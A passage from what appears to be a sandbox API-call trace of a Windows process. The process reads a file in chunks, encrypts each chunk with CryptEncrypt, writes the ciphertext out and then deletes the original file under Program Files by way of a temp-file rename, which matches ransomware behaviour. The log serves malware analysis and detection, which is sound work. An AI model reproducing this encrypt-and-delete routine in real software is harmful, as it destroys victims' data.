lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.295] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.295] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.295] GetLastError () returned 0x0 [0148.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.295] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.295] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.296] GetLastError () returned 0x0 [0148.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.296] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.296] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.296] GetLastError () returned 0x0 [0148.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.296] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.296] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.296] GetLastError () returned 0x0 [0148.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.296] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.296] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.296] GetLastError () returned 0x0 [0148.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.296] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.296] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.296] GetLastError () returned 0x0 [0148.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.296] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.296] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.296] GetLastError () returned 0x0 [0148.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.296] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.296] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.296] GetLastError () returned 0x0 [0148.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.297] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.297] GetLastError () returned 0x0 [0148.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.297] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.297] GetLastError () returned 0x0 [0148.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.297] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.297] GetLastError () returned 0x0 [0148.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.297] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.297] GetLastError () returned 0x0 [0148.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.297] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.297] GetLastError () returned 0x0 [0148.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.297] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.297] GetLastError () returned 0x0 [0148.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.298] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.298] GetLastError () returned 0x0 [0148.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.298] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.298] GetLastError () returned 0x0 [0148.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.298] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.298] GetLastError () returned 0x0 [0148.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.298] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.298] GetLastError () returned 0x0 [0148.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.298] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.298] GetLastError () returned 0x0 [0148.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.298] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.298] GetLastError () returned 0x0 [0148.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.299] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.299] GetLastError () returned 0x0 [0148.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.299] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.299] GetLastError () returned 0x0 [0148.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.299] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.299] GetLastError () returned 0x0 [0148.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.299] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.299] GetLastError () returned 0x0 [0148.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.299] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.299] GetLastError () returned 0x0 [0148.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.299] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.299] GetLastError () returned 0x0 [0148.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.300] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.300] GetLastError () returned 0x0 [0148.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.300] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0148.300] GetLastError () returned 0x0 [0148.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0148.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0148.300] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0148.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui")) returned 0x20 [0148.300] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0148.300] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 1 [0148.300] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui")) returned 0 [0148.301] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" [0148.301] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG") returned 1 [0148.301] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\.xXB63E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\.xxb63e.tmp")) returned 0xb63e [0148.302] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\.xXB63E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\.xxb63e.tmp"), dwFlags=0x1) returned 0 [0148.302] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\.xXB63E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\.xxb63e.tmp")) returned 1 [0148.302] CryptDestroyKey (hKey=0x9ad738) returned 1 [0148.302] wcslen (_String="OK") returned 0x2 [0148.302] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.302] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.302] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0148.302] CryptDestroyHash (hHash=0x9ad238) returned 1 [0148.302] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0148.302] FindNextFileW (in: 